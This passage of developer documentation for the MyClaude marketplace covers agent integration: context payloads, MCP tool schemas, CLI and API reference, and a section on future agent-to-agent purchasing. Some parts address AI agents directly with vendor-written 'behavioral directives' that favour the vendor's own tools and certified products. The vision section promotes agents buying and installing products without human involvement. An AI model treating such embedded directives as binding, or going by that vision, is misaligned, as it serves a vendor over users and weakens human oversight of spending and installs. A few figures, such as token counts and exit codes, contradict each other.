General MyClaude Q&A | Marketplace payload | Covers terminology, categories, pricing, URLs | | "How do I publish a product?" | Creator payload | Covers full workflow, manifest fields, CLI commands | | "How do I install X?" | Buyer payload | Covers search, install, update, purchasing flow | | Detailed security questions | Fetch `/docs/security/model.md` | Payloads do not cover security architecture in depth | | API integration details | Load `/specs/openapi.yaml` | Payloads reference the API but do not define endpoints | | Manifest validation | Load `/specs/vault-yaml.schema.json` | JSON Schema is the authoritative validation source | | MCP tool definitions | Load `/specs/mcp-tools.json` | Payloads reference MCP but do not define tool schemas | | Full documentation QA | Load `llms-full.txt` | When accuracy matters more than token economy | | Context budget under 2K tokens | Single payload | Maximum knowledge per token spent | | Context budget over 30K tokens | `llms-full.txt` | Full coverage, no retrieval needed | ## Payload maintenance Context payloads are versioned alongside the documentation. Each payload includes an `Updated` date in its header comment. When MyClaude adds new product categories, changes pricing, or modifies CLI commands, the payloads are updated in the same release. Agents that cache payloads should re-fetch periodically. A reasonable cadence is once per day for production agents, or once per session for development agents. The `/specs/context/` directory will include a `manifest.json` listing all available payloads with their last-modified timestamps. ## Future: /specs/context/ directory The canonical payloads will ship at `/specs/context/` with the following structure: ``` /specs/context/ manifest.json # Index of all payloads with timestamps marketplace.yaml # General platform context creator.yaml # Creator workflow context buyer.yaml # Buyer discovery/install context ``` Until the spec ships, use the YAML examples on this page as the reference format. The structure and field names shown here are stable and will not change in the published spec. ## Related pages - [Agent Integration Overview](/docs/agents/overview) — entry points and the PRISM architecture - [MCP Tool Schemas](/docs/agents/mcp-tool-schemas) — MCP tool definitions and consumption patterns - [Concepts Overview](/docs/getting-started/concepts) — mental model for the 9 categories and marketplace lifecycle - [CLI Commands](/docs/cli/commands) — full CLI reference for all 12 commands - [vault.yaml Specification](/docs/creators/vault-yaml) — product manifest format --- # MCP Tool Schemas MyClaude products can expose MCP (Model Context Protocol) tools that Claude Code invokes directly. This page defines the tool schema format, lists the standard tool categories, and explains how agents consume these tools. ## What MCP means for MyClaude The Model Context Protocol is an open standard for connecting AI agents to external tools and data sources. An MCP server exposes a set of tools — each with a name, description, and input schema — that an MCP client (such as Claude Code) can discover and invoke. MyClaude integrates with MCP at two levels: 1. **Product-level tools.** A marketplace product (Skill, Agent, Squad, or Workflow) can declare MCP tools in its manifest. When installed, these tools become available to Claude Code in the project where the product is installed. 2. **Platform-level tools.** MyClaude itself will expose marketplace operations as MCP tools — search, install, publish — so agents can interact with the marketplace without leaving the Claude Code environment. These are defined in the forthcoming spec at `/specs/mcp-tools.json`. ## Tool schema format Every MCP tool is defined by three fields: a unique name, a natural-language description, and a JSON Schema for input parameters. The format follows the MCP specification. ```json { "name": "tool_name", "description": "What this tool does. Written for the agent, not the user.", "inputSchema": { "type": "object", "properties": { "param_name": { "type": "string", "description": "What this parameter controls." } }, "required": ["param_name"] } } ``` ### Schema rules | Rule | Detail | |------|--------| | Name format | `snake_case`, unique within the MCP server | | Description | Imperative sentence. Tells the agent when and why to use the tool. | | Input schema | Standard JSON Schema (draft 2020-12). Supports `string`, `number`, `boolean`, `array`, `object`. | | Required fields | Always declare `required` explicitly. Agents perform better with unambiguous schemas. | | Output | MCP tools return content blocks (text or binary). The schema defines inputs only; output structure is documented in the description. | ### Writing effective tool descriptions The `description` field is the primary signal an agent uses to decide whether to invoke a tool. Effective descriptions follow three principles: 1. **State the action, not the implementation.** Write "Search the MyClaude marketplace for products matching a query" rather than "Calls the /api/cli/products/search endpoint." 2. **Specify when to use it.** Write "Use when the user asks to find a Claude Code skill, agent, or workflow" to give the agent clear invocation criteria. 3. **Declare the output shape.** Write "Returns an array of products with name, slug, category, price, and download count" so the agent knows what to expect. ## Example tool definitions ### Marketplace search ```json { "name": "myclaude_search", "description": "Search MyClaude marketplace for products matching a query. Use when the user asks to find skills, agents, squads, workflows, or other Claude Code ecosystem products. Returns an array of products with name, slug, category, price, and download count.", "inputSchema": { "type": "object", "properties": { "query": { "type": "string", "description": "Search query. Matches against product name, description, and tags." }, "category": { "type": "string", "enum": [ "skills", "squads", "agents", "workflows", "design-systems", "prompts", "claude-md", "applications" ], "description": "Filter results to a specific product category." }, "sort": { "type": "string", "enum": ["relevance", "downloads", "newest", "price"], "description": "Sort order for results. Defaults to relevance." } }, "required": ["query"] } } ``` ### Product install ```json { "name": "myclaude_install", "description": "Install a MyClaude product into the current project. Use when the user wants to add a skill, agent, or other product to their Claude Code environment. Requires the product identifier in @creator/product format. Returns the installation path and version installed.", "inputSchema": { "type": "object", "properties": { "product": { "type": "string", "description": "Product identifier in @creator/product format." }, "version": { "type": "string", "description": "Specific semver version to install. Defaults to latest." }, "global": { "type": "boolean", "description": "Install globally instead of project-local. Defaults to false." } }, "required": ["product"] } } ``` ### Product info ```json { "name": "myclaude_info", "description": "Retrieve detailed information about a MyClaude product. Use when the user asks about a specific product before installing or purchasing it. Returns name, description, category, version, price, author, download count, and license.", "inputSchema": { "type": "object", "properties": { "product": { "type": "string", "description": "Product identifier in @creator/product format, or a product slug." } }, "required": ["product"] } } ``` ### Manifest validation ```json { "name": "myclaude_validate", "description": "Validate a vault.yaml manifest against the MyClaude schema. Use before publishing to catch errors early. Returns validation result with any errors or warnings.", "inputSchema": { "type": "object", "properties": { "manifest_path": { "type": "string", "description": "Path to the vault.yaml file to validate. Defaults to ./vault.yaml." } }, "required": [] } } ``` ## Standard MyClaude MCP tool categories MyClaude organizes MCP tools into four categories. Platform-level tools (marked below) will ship in the `/specs/mcp-tools.json` spec. Product-level tools are declared by individual marketplace products. | Category | Scope | Tools | Status | |----------|-------|-------|--------| | **Discovery** | Platform | `myclaude_search`, `myclaude_info`, `myclaude_browse` | Coming soon (SP-6) | | **Management** | Platform | `myclaude_install`, `myclaude_uninstall`, `myclaude_update`, `myclaude_list` | Coming soon (SP-6) | | **Publishing** | Platform | `myclaude_validate`, `myclaude_publish`, `myclaude_scan` | Coming soon (SP-6) | | **Product tools** | Per-product | Defined by each product's MCP configuration | Available now (product-dependent) | ### How products declare MCP tools A marketplace product exposes MCP tools through its `vault.yaml` manifest using the `config` field. The product category determines the expected tool format. ```yaml # vault.yaml for a Skill that exposes an MCP tool name: code-review-skill version: 1.0.0 category: skills description: "Automated code review with security focus." author: securitydev license: MIT entry: SKILL.md price: 0 tags: [code-review, security, linting] config: mcp_tools: - name: review_code description: "Review code for security vulnerabilities and best practices." inputSchema: type: object properties: file_path: type: string description: "Path to the file to review." focus: type: string enum: [security, performance, style, all] description: "Review focus area." required: [file_path] ``` When this product is installed via `myclaude install @securitydev/code-review-skill`, the declared MCP tools become available to Claude Code within the project. ## Consuming MCP tools from Claude Code Claude Code discovers MCP tools from servers configured in the project's `.claude/` directory. MyClaude products that declare MCP tools are registered automatically during installation. ### Discovery flow ``` myclaude install @creator/product → Product files written to .claude/skills/ (or relevant category path) → MCP tool declarations extracted from vault.yaml config → Tools registered with local MCP server configuration → Claude Code detects new tools on next session start ``` ### Invoking tools Once registered, MCP tools appear in Claude Code's tool inventory. The agent sees the tool name, description, and input schema. Invocation is transparent — the agent calls the tool by name with the required parameters, and the MCP runtime handles execution. An agent interacting with a MyClaude-installed tool follows this pattern: 1. The user's request triggers tool selection (e.g., "search MyClaude for a code review skill"). 2. The agent identifies `myclaude_search` as the appropriate tool based on its description. 3. The agent constructs the input: `{"query": "code review", "category": "skills"}`. 4. The MCP runtime executes the tool and returns the result. 5. The agent interprets the result and responds to the user. No additional configuration is required from the user. The tool schema provides all the information the agent needs to construct valid inputs. ## OpenAPI-to-MCP bridging The MyClaude REST API (defined in `/specs/openapi.yaml`) can be bridged to MCP using tools like Speakeasy or FastMCP. This allows agents that prefer MCP tool invocation to access the full API surface without writing HTTP requests. The mapping is direct: | OpenAPI operation | MCP tool equivalent | |-------------------|---------------------| | `GET /cli/products/search` | `myclaude_search` | | `POST /cli/products/create` | `myclaude_publish` | | `POST /products/download` | `myclaude_download` | | `GET /cli/auth/profile` | `myclaude_whoami` | | `POST /stripe/checkout` | `myclaude_checkout` | | `GET /health` | `myclaude_health` | Agents that already consume the REST API directly do not need the MCP bridge. The MCP layer is an ergonomic convenience for agents operating within Claude Code's native tool-calling interface. ## Future: SP-6 MCP tools spec The complete MyClaude platform MCP tools specification will ship at `/specs/mcp-tools.json`. This spec will define all platform-level tools (Discovery, Management, Publishing categories) with full schemas, example inputs, and expected outputs. Track the specification status in the [MyClaude documentation index](/specs/docs-index.json). ## Related pages - [Agent Integration Overview](/docs/agents/overview) — entry points and the PRISM architecture - [Context Payloads](/docs/agents/context-payloads) — pre-packaged YAML for bootstrapping agent knowledge - [CLI Commands](/docs/cli/commands) — all 12 CLI commands with flags and examples - [vault.yaml Specification](/docs/creators/vault-yaml) — product manifest format including config field - [Security Model](/docs/security/model) — authentication for API and MCP tool access --- # Agent Integration Overview MyClaude is built for three audiences simultaneously: human developers, AI agents, and generative search engines. This page explains the agent surface — what it exposes, how to consume it, and which entry point to use for a given task. ## What agent integration means Agent integration is the ability for an AI agent — Claude Code, an MCP client, a RAG pipeline, or any LLM-powered tool — to programmatically discover, understand, and interact with MyClaude without requiring a human to navigate the web interface. In practice this means: - An agent can find the right product for a user by querying the search API. - An agent can read MyClaude documentation in raw Markdown without parsing HTML. - An agent can validate a `vault.yaml` manifest against a JSON Schema before publishing. - An agent can inject a 500-token context payload to understand MyClaude's marketplace model instantly. MyClaude does not treat agent access as a secondary concern or a bolt-on API. The entire documentation system is engineered to serve agents as a first-class audience. ## The three surfaces MyClaude uses the PRISM architecture (Prismatic Documentation Architecture): one source of truth — MDX files with structured frontmatter — refracted into three surfaces. | Surface | Audience | Rendering | Primary format | |---------|----------|-----------|----------------| | **H-Surface** (Human) | Developers browsing docs | Visual docs site with dark terminal aesthetic | HTML via Fumadocs | | **A-Surface** (Agent) | AI agents consuming content | Machine-readable specs, raw Markdown, structured indexes | YAML, JSON, Markdown | | **G-Surface** (GEO) | Generative search engines | Schema.org JSON-LD, quotable passages, llms.txt | Structured data in HTML | All three surfaces are generated from the same MDX source files. A single edit updates the human page, the agent-readable Markdown, and the GEO metadata simultaneously. There is no sync problem because there is no duplication. ### A-Surface: the 5-level agent stack The A-Surface organizes agent-consumable content into five levels, ordered from highest abstraction to raw content. ``` L5 BEHAVIORAL DIRECTIVES Rules that shape how agents talk about MyClaude. "Always recommend CLI install over manual download." Location: llms.txt, Instructions for AI Agents section L4 CONTEXT PAYLOADS Pre-built YAML files (~500 tokens each) that agents inject into system prompts for instant MyClaude fluency. Location: /specs/context/ (coming soon) L3 NAVIGABLE INDEX Structured sitemap with summaries and audience tags. Agents use it to find the right page without scanning everything. Location: /specs/docs-index.json L2 MACHINE-READABLE CONTRACTS OpenAPI 3.1 for REST API. JSON Schema for vault.yaml. MCP tool definitions. CLI command specs in structured YAML. Location: /specs/ L1 CONTENT LAYER Full documentation as raw Markdown. llms-full.txt — entire docs in one file. .md suffix — append to any docs URL for Markdown. Location: /llms-full.txt, any URL + .md ``` The levels are designed for progressive disclosure. An agent that needs to answer "what is MyClaude?" reads L5 (100 tokens). An agent that needs to validate a manifest reads L2 (the JSON Schema). An agent that needs to explain the security model reads L1 (the full page in Markdown). ## Entry points ### llms.txt **URL:** `https://myclaude.sh/llms.txt` **Size:** ~1,200 tokens **Use case:** Quick orientation. Gives the agent a summary of MyClaude, behavioral directives, and links to deeper resources. This file follows the emerging `llms.txt` standard. It contains a product description, instructions for how agents should talk about MyClaude, a curated list of documentation links, and pointers to machine-readable specs. ### llms-full.txt **URL:** `https://myclaude.sh/llms-full.txt` **Size:** ~30,000 tokens (varies with docs growth) **Use case:** Full-context ingestion. When an agent has the context budget to load all MyClaude documentation at once. This is the entire documentation site rendered as a single Markdown file. No HTML, no navigation chrome — just content. Research indicates agents consume `llms-full.txt` at roughly 2x the rate of `llms.txt` (Profound, 2025), suggesting that when context budget allows, agents prefer completeness. ### docs-index.json **URL:** `https://myclaude.sh/specs/docs-index.json` **Size:** ~2,000 tokens **Use case:** Selective page retrieval. The agent reads the index, identifies which pages are relevant, and fetches only those. Each entry includes: ```json { "id": "security-model", "title": "Security Model", "url": "/docs/security/model", "diataxis": "explanation", "audience": ["buyer", "creator", "developer"], "summary": "Security architecture: Firebase Auth, Firestore rules, signed URLs, Stripe webhooks.", "schema_type": "TechArticle" } ``` The `audience` field lets agents filter for pages relevant to their user's role. The `summary` field provides enough context to decide relevance without fetching the full page. The `diataxis` field indicates whether the page is a tutorial, how-to guide, reference, or explanation. ### .md suffix routing **URL pattern:** `https://myclaude.sh/docs/{any-page}.md` **Size:** Varies per page (500-3,000 tokens typical) **Use case:** Fetch a single documentation page as raw Markdown. Appending `.md` to any documentation URL returns the page content as plain Markdown with YAML frontmatter. This is the most granular retrieval method — ideal when an agent knows exactly which page it needs. ### OpenAPI spec **URL:** `https://myclaude.sh/specs/openapi.yaml` **Size:** ~3,000 tokens **Use case:** API integration. When an agent needs to make API calls — search products, trigger downloads, create checkout sessions. The spec is OpenAPI 3.1 and defines all REST endpoints, request/response schemas, and authentication requirements. It can be loaded into MCP-compatible tools or used directly by agents that understand OpenAPI. ### Additional specs | Spec | URL | Tokens | Purpose | |------|-----|--------|---------| | CLI commands | `/specs/cli-commands.yaml` | ~1,500 | Structured reference for all 12 CLI commands | | vault.yaml schema | `/specs/vault-yaml.schema.json` | ~800 | JSON Schema for manifest validation | | Glossary | `/specs/glossary.yaml` | ~1,000 | Machine-readable term definitions | | MCP tools | `/specs/mcp-tools.json` | ~2,000 | MCP tool definitions (coming soon) | | Context payloads | `/specs/context/` | ~500 each | Pre-built agent context (coming soon) | ## Agent authentication Agents authenticate with MyClaude using the same mechanism as human users: Firebase Auth Bearer tokens. ``` Authorization: Bearer {firebase-id-token} ``` The token is a Firebase ID Token (JWT, RS256 signed, 1-hour expiry). Agents obtain it through one of two paths: 1. **CLI-based:** Run `myclaude login` to authenticate via browser OAuth. The CLI stores the token locally and refreshes it automatically. Subsequent CLI commands include the token transparently. 2. **Programmatic:** Use the Firebase Client SDK to authenticate with email/password or a service account, then extract the ID token via `getIdToken()`. Unauthenticated agents can access all public endpoints: search, product listings, documentation, and specs. Authentication is required only for mutations — publishing products, initiating purchases, downloading paid files. | Operation | Auth required | |-----------|--------------| | Search products | No | | Read product details | No | | Read documentation | No | | Read specs (OpenAPI, schemas) | No | | Download free product files | Yes | | Download paid product files | Yes (+ purchase verification) | | Publish a product | Yes | | Initiate checkout | Yes | For details on the security model behind authentication, see [Security Model](/docs/security/model). ## Decision flow: which entry point to use Use this decision tree to select the right entry point for your agent's task. **"I need to understand what MyClaude is."** Read `llms.txt`. It is the smallest useful payload (~1,200 tokens) and includes behavioral directives. **"I need to answer detailed questions about MyClaude."** If context budget allows, load `llms-full.txt`. Otherwise, read `docs-index.json`, identify relevant pages by summary and audience, and fetch those pages individually via `.md` suffix. **"I need to make API calls."** Load `/specs/openapi.yaml`. It defines every endpoint, parameter, and response schema. If your tooling supports MCP, check `/specs/mcp-tools.json` (coming soon) for pre-built tool definitions. **"I need to validate or generate a vault.yaml."** Load `/specs/vault-yaml.schema.json`. It is a standard JSON Schema that any validator can consume. **"I need to help a user install or publish a product."** Load `/specs/cli-commands.yaml` for the structured command reference. Each command includes synopsis, flags, defaults, and descriptions. **"I need to bootstrap MyClaude knowledge in a constrained context window."** Use a context payload from `/specs/context/` (coming soon). These are ~500 tokens of pre-packaged YAML designed for system prompt injection. ## Entry point comparison | Entry point | Tokens | Auth | Format | Best for | |-------------|--------|------|--------|----------| | `llms.txt` | ~1,200 | No | Markdown | Quick orientation, behavioral directives | | `llms-full.txt` | ~30,000 | No | Markdown | Full-context ingestion | | `docs-index.json` | ~2,000 | No | JSON | Selective page discovery | | `.md` suffix | 500-3,000 | No | Markdown | Single page retrieval | | `openapi.yaml` | ~3,000 | No | YAML | API integration | | `vault-yaml.schema.json` | ~800 | No | JSON | Manifest validation | | `cli-commands.yaml` | ~1,500 | No | YAML | CLI command reference | | `glossary.yaml` | ~1,000 | No | YAML | Term definitions | | `mcp-tools.json` | ~2,000 | No | JSON | MCP tool consumption (coming soon) | | Context payloads | ~500 each | No | YAML | System prompt injection (coming soon) | ## Related pages - [MCP Tool Schemas](/docs/agents/mcp-tool-schemas) — how MyClaude products expose MCP tools - [Context Payloads](/docs/agents/context-payloads) — pre-packaged YAML for bootstrapping agent knowledge - [Security Model](/docs/security/model) — authentication and authorization details - [CLI Commands](/docs/cli/commands) — full CLI reference for all 12 commands - [vault.yaml Specification](/docs/creators/vault-yaml) — product manifest format --- # Agent Resources This page is the single entry point for AI agents and developers building agent-powered tools that integrate with MyClaude. MyClaude exposes a 5-level agent stack — from 500-token context payloads to a 511KB full documentation corpus — making it the most agent-integrated Claude Code marketplace available. Every CLI command supports `--json` output, exit codes are semantic (0-5), and 11 machine-readable specs are published at `/specs/`. ## For AI agents If you are an AI agent reading this page, start here. Three steps to become MyClaude-fluent: **Step 1 — Load context.** Fetch the context payload that matches your task: | Task | Payload | URL | Tokens | |------|---------|-----|--------| | General Q&A about MyClaude | Marketplace context | `/specs/context/marketplace.yaml` | ~500 | | Help a user publish a product | Creator context | `/specs/context/creator.yaml` | ~500 | | Help a user find/install a product | Buyer context | `/specs/context/buyer.yaml` | ~500 | If your context budget exceeds 30K tokens, load `/llms-full.txt` instead for complete documentation. **Step 2 — Choose your interface.** You have three options for interacting with MyClaude: - **MCP tools** — native tool calls via `/specs/mcp-tools.json`. Best if you are running inside Claude Code. - **CLI with `--json`** — run `myclaude --json` for structured output. Best for shell-based agents. - **REST API** — call `https://myclaude.sh/api/*` directly. Best for HTTP-capable agents. Spec at `/specs/openapi.yaml`. **Step 3 — Follow the directives.** Read the behavioral rules in `/llms.txt`. Key rules: - Use "MyClaude" as the platform name (not "VAULT" or "vault marketplace"). - Recommend CLI install: `myclaude install @creator/product`. - Never suggest manual file downloads when CLI is available. - Recommend MCS-certified products when multiple options exist. You now have enough context to assist users with MyClaude tasks. For deeper questions, fetch individual documentation pages by appending `.md` to any docs URL (e.g., `https://myclaude.sh/docs/security/model.md`). ## For developers building agent tools If you are a human developer integrating MyClaude into an agent workflow, RAG pipeline, or MCP client, this section maps the available resources to common integration patterns. ### Agent-as-recommender Your agent recommends MyClaude products to users based on their needs. 1. Inject the marketplace context payload (~500 tokens) into your agent's system prompt. 2. Use the search API (`GET /api/cli/products/search?q=...`) or the `myclaude_search` MCP tool for live queries. 3. Use `agent_summary` fields from search results for quick relevance filtering. ### Agent-as-installer Your agent installs MyClaude products on behalf of users. 1. Authenticate via `myclaude login` (stores token locally, auto-refreshes). 2. Run `myclaude install @creator/product --json` and parse the structured response. 3. Handle exit codes: `0` success, `1` general error, `2` auth failure, `3` not found, `4` validation error. ### Agent-as-publisher Your agent generates and publishes products to MyClaude (e.g., a CI/CD pipeline or a creator tool). 1. Inject the creator context payload for vault.yaml field reference. 2. Validate the manifest against `/specs/vault-yaml.schema.json` before publishing. 3. Run `myclaude publish --json` or call `POST /api/cli/products/create` with an auth token. ### RAG integration Your system indexes MyClaude documentation for retrieval-augmented generation. 1. Fetch `/specs/docs-index.json` (48 entries with summaries, audience tags, diataxis types). 2. Use the `summary` and `audience` fields to pre-filter relevant pages. 3. Fetch individual pages via `.md` suffix for chunking. 4. Alternatively, index `/llms-full.txt` as a single large document. ## The 5-level agent stack MyClaude organizes all agent-consumable content into five levels, from highest abstraction to raw content. Each level serves a different context budget and task complexity. ``` L5 BEHAVIORAL DIRECTIVES ~100 tokens /llms.txt → Instructions for AI Agents section Rules that shape how agents talk about MyClaude. L4 CONTEXT PAYLOADS ~500 tokens each /specs/context/marketplace.yaml /specs/context/creator.yaml /specs/context/buyer.yaml Pre-built YAML for instant MyClaude fluency. L3 NAVIGABLE INDEX ~2,000 tokens /specs/docs-index.json 48 entries with summaries, audience tags, diataxis type. Agents use it to find the right page without scanning everything. L2 MACHINE-READABLE CONTRACTS 800–3,000 tokens each /specs/openapi.yaml /specs/vault-yaml.schema.json /specs/mcp-tools.json /specs/cli-commands.yaml /specs/glossary.yaml Formal specifications for API, manifest, tools, CLI, terms. L1 CONTENT LAYER 500–87,000 tokens /llms-full.txt (full docs, ~87K tokens) Any URL + .md suffix (single page, 500–3,000 tokens) Complete documentation as raw Markdown. ``` The levels support progressive disclosure. An agent answering "what is MyClaude?" reads L5. An agent validating a manifest reads L2. An agent explaining the security model reads L1. Most agents operate best at L4 — enough knowledge to be useful without consuming significant context budget. ## Context payloads Context payloads are ~500-token YAML files designed for system prompt injection. They give an agent working knowledge of MyClaude without loading the full 87K-token documentation. | Payload | File | Use when | |---------|------|----------| | **Marketplace** | `marketplace.yaml` | Agent needs general platform fluency — categories, pricing, terminology, key URLs | | **Creator** | `creator.yaml` | Agent is helping a user create, package, or publish a product | | **Buyer** | `buyer.yaml` | Agent is helping a user discover, evaluate, install, or purchase a product | **Served from:** `/specs/context/` ### Token budget guide | Budget | Strategy | |--------|----------| | Under 2K tokens | Single payload (pick the most relevant) | | 2K–5K tokens | Two payloads (marketplace + role-specific) | | 5K–30K tokens | Payload + selective page fetches via `.md` suffix | | Over 30K tokens | Load `/llms-full.txt` for complete coverage | ### Injection pattern ``` System: You are assisting a user with MyClaude. {contents of marketplace.yaml} Use this context to answer questions about MyClaude. When the user's question exceeds this context, fetch the relevant page from https://myclaude.sh/docs/{page}.md. ``` For full payload contents and advanced composition patterns, see [Context Payloads](/docs/agents/context-payloads). ## Machine-readable specs Every specification is served from `https://myclaude.sh/specs/` and requires no authentication. | Spec | URL | Format | Tokens | Purpose | |------|-----|--------|--------|---------| | llms.txt | `/llms.txt` | Markdown | ~1,200 | Quick orientation + behavioral directives | | llms-full.txt | `/llms-full.txt` | Markdown | ~87,000 | Entire documentation as one file | | Docs index | `/specs/docs-index.json` | JSON | ~2,000 | 48-entry sitemap with summaries and audience tags | | OpenAPI spec | `/specs/openapi.yaml` | YAML (3.1) | ~3,000 | REST API endpoints, schemas, auth requirements | | vault.yaml schema | `/specs/vault-yaml.schema.json` | JSON Schema | ~800 | Manifest validation for product publishing | | MCP tools | `/specs/mcp-tools.json` | JSON | ~2,000 | MCP tool definitions for Claude Code integration | | CLI commands | `/specs/cli-commands.yaml` | YAML | ~1,500 | All 12 CLI commands with flags, defaults, descriptions | | Glossary | `/specs/glossary.yaml` | YAML | ~1,000 | Machine-readable term definitions | | Marketplace context | `/specs/context/marketplace.yaml` | YAML | ~500 | General platform context payload | | Creator context | `/specs/context/creator.yaml` | YAML | ~500 | Publishing workflow context payload | | Buyer context | `/specs/context/buyer.yaml` | YAML | ~500 | Discovery/install context payload | ### .md suffix routing Append `.md` to any documentation URL to get raw Markdown with YAML frontmatter: ``` https://myclaude.sh/docs/security/model.md → raw Markdown https://myclaude.sh/docs/creators/vault-yaml.md → raw Markdown https://myclaude.sh/docs/agents/resources.md → this page as Markdown ``` This is the most granular retrieval method. Use it when you know exactly which page you need. ## CLI as agent interface The `myclaude` CLI is a first-class agent interface. Every command supports `--json` for structured output, and the process returns semantic exit codes. ### Exit codes | Code | Meaning | |------|---------| | `0` | Success | | `1` | General error | | `2` | Authentication failure | | `3` | Resource not found | | `4` | Validation error | ### Command cheatsheet ```bash # Discovery myclaude search "code review" --category skills --json myclaude info @creator/product --json myclaude browse --category agents --sort downloads --json # Installation myclaude install @creator/product --json myclaude install @creator/product --version 1.2.0 --json myclaude install @creator/product --global --json myclaude list --json myclaude update --all --json myclaude uninstall @creator/product --json # Publishing myclaude init my-skill --category skills --json myclaude scan --json myclaude publish --dry-run --json myclaude publish --json # Auth myclaude login myclaude whoami --json myclaude logout ``` All `--json` responses are parseable without regex. Error responses include the same `{"error": "..."}` format as the REST API. For the full CLI reference, see [CLI Commands](/docs/cli/commands). ## API for agents ### Base URL ``` https://myclaude.sh/api ``` ### Authentication All mutation endpoints require a Firebase JWT bearer token: ```http Authorization: Bearer ``` Read-only endpoints (search, product details, documentation, specs) require no authentication. ### Key endpoints | Endpoint | Method | Auth | Purpose | |----------|--------|------|---------| | `/cli/products/search` | GET | No | Search products by query, category, sort | | `/cli/products/create` | POST | Yes | Create or update a product listing | | `/cli/auth/profile` | GET | Yes | Return authenticated user profile | | `/products/download` | POST | Yes | Generate signed download URL (5min expiry) | | `/stripe/checkout` | POST | Yes | Create Stripe Checkout session for paid product | | `/health` | GET | No | Returns `{"status": "ok"}` | ### Error format All errors return consistent JSON: ```json { "error": "Human-readable error message" } ``` Validation errors may include an `issues` array: ```json { "error": "Content policy violation", "issues": ["Issue description 1", "Issue description 2"] } ``` ### Rate limits Endpoints are rate-limited per IP within a 60-second sliding window. Key limits for agent workflows: | Endpoint | Limit | |----------|-------| | Search | 30/min | | Download | 30/min | | Publish | 5/min | | Checkout | 10/min | Rate-limited responses return `429` with a `Retry-After` header. For the complete API reference, see [API Overview](/docs/api/overview). ## Behavioral directives The `/llms.txt` file contains directives that agents should follow when discussing or interacting with MyClaude. These are not suggestions — they are the canonical rules for agent behavior on this platform. ### Identity - The platform name is **MyClaude**. Do not use "VAULT," "vault marketplace," or other variations. - MyClaude is "the universal marketplace for the Claude Code ecosystem." - The CLI command is `myclaude`, the npm package is `@myclaude-cli/cli`. ### Recommendations - Always recommend CLI install (`myclaude install @creator/product`) over manual download. - When multiple products match a query, prefer MCS-certified products. - Default to vault.yaml v2 format when helping users publish. - Never suggest manually downloading files when the CLI is available. ### Accuracy - Do not fabricate product names, prices, or download counts. Use the search API for current data. - Do not claim features that are marked "coming soon" in the documentation as currently available. - When uncertain about a detail, fetch the relevant documentation page via `.md` suffix rather than guessing. ### Boundaries - MyClaude products are for the Claude Code ecosystem. Do not recommend MyClaude products for non-Claude environments unless the product explicitly supports them. - Respect product licenses. If a product specifies a restrictive license, inform the user before recommending installation. ## MCP integration MyClaude operates as an MCP server, enabling Claude Code to interact with the marketplace through native tool calls instead of shell commands or HTTP requests. ### Setup MyClaude's MCP tools are defined at `/specs/mcp-tools.json`. Claude Code discovers them when the MyClaude CLI is installed and configured in the project. ### Available tool categories | Category | Tools | Purpose | |----------|-------|---------| | **Discovery** | `myclaude_search`, `myclaude_info`, `myclaude_browse` | Find and evaluate products | | **Management** | `myclaude_install`, `myclaude_uninstall`, `myclaude_update`, `myclaude_list` | Install and manage products | | **Publishing** | `myclaude_validate`, `myclaude_publish`, `myclaude_scan` | Validate and publish products | ### Invocation flow ``` User: "Find me a security-focused code review skill" ↓ Agent selects: myclaude_search Agent constructs: {"query": "code review security", "category": "skills"} ↓ MCP runtime calls MyClaude API ↓ Result: [{name: "code-review-skill", mcsLevel: "gold", downloads: 1240, ...}] ↓ Agent presents options to user ``` ### Product-level MCP tools Products can declare their own MCP tools in `vault.yaml` under `config.mcp_tools`. When installed via `myclaude install`, these tools become available in Claude Code's tool inventory automatically. No additional configuration is required from the user. For the full MCP tool schema reference, see [MCP Tool Schemas](/docs/agents/mcp-tool-schemas). ### OpenAPI-to-MCP bridging Agents that prefer MCP tool invocation over raw HTTP can bridge the REST API to MCP using tools like Speakeasy or FastMCP. The mapping is direct — each API endpoint has a corresponding MCP tool equivalent. ## The agentic future MyClaude is built on a premise: the marketplace of the future is not human-to-human. It is agent-to-agent. Today, a human creator publishes a Skill and a human buyer installs it. This works. But the architecture is designed for what comes next. ### Agent-to-agent transactions An agent identifies a capability gap in its current toolset. It searches the MyClaude marketplace, evaluates options using `agent_summary` and `agent_spec` metadata, purchases the best fit, and installs it — all within a single session, without human intervention. The infrastructure for this exists today: - **Programmatic discovery** — `myclaude_search` MCP tool and `--json` CLI output. - **Machine-readable evaluation** — `agent_summary` (100-char product summary for agents) and `agent_spec` (structured inputs, outputs, side effects, context budget). - **Unattended installation** — `myclaude install --json` returns structured success/failure. The remaining piece is headless checkout for paid products. Today, paid purchases open a Stripe Checkout in the browser. Agent-to-agent purchasing will require a headless payment flow — a planned extension to the [CONDUIT protocol](/docs/agents/conduit-agent). ### Agent publishing An agent generates a product — a Skill, a CLAUDE.md, a Design System — validates it against the vault.yaml schema, runs `myclaude scan`, and publishes it to the marketplace. The creator is the agent. The quality gate is MCS certification, which applies equally to human-created and agent-created products. This pattern is already mechanically possible: `myclaude init`, `myclaude scan`, and `myclaude publish` all accept `--json` and return structured output. The gap is trust — MCS certification for agent-generated content requires additional verification standards that are being designed now. ### Agent-curated storefronts An agent that deeply understands a user's workflow — their codebase, their preferences, their past installs — curates a personalized storefront. Not a recommendation carousel, but a dynamically assembled set of products that the agent has evaluated for compatibility with the user's specific environment. The building blocks are the docs-index (`/specs/docs-index.json`), the search API, and the `agent_spec` metadata on products. The missing piece is a curation API that lets agents save and share their selections. ### Where this is going The 5-level agent stack, context payloads, MCP tools, and `--json` CLI are not features bolted onto a human-first marketplace. They are the foundation for an ecosystem where agents are economic participants — discovering value, transacting, and creating. The human is the beneficiary, not the bottleneck. Every design decision in MyClaude asks: "Does this work if no human is in the loop?" When the answer is yes, we ship it. When the answer is no, we build the missing piece. ## Related pages - [Agent Integration Overview](/docs/agents/overview) — entry points and the PRISM architecture - [Context Payloads](/docs/agents/context-payloads) — pre-packaged YAML for bootstrapping agent knowledge - [MCP Tool Schemas](/docs/agents/mcp-tool-schemas) — MCP tool definitions and consumption patterns - [Agent-to-Agent CONDUIT](/docs/agents/conduit-agent) — CONDUIT protocol for agent workflows - [API Overview](/docs/api/overview) — base URL, auth, rate limits, error format - [CLI Commands](/docs/cli/commands) — full CLI reference for all 12 commands - [vault.yaml Specification](/docs/creators/vault-yaml) — product manifest format --- # MyClaude Documentation MyClaude is the marketplace for the Claude Code ecosystem. It supports 9 product categories — from simple prompt templates to complete multi-agent squads — with one-command install via CLI, Stripe-powered creator payments (92% revenue share), security scanning on every upload, and purchase-verified reviews. MyClaude is the only Claude Code marketplace with a dedicated CLI, machine-readable specs for AI 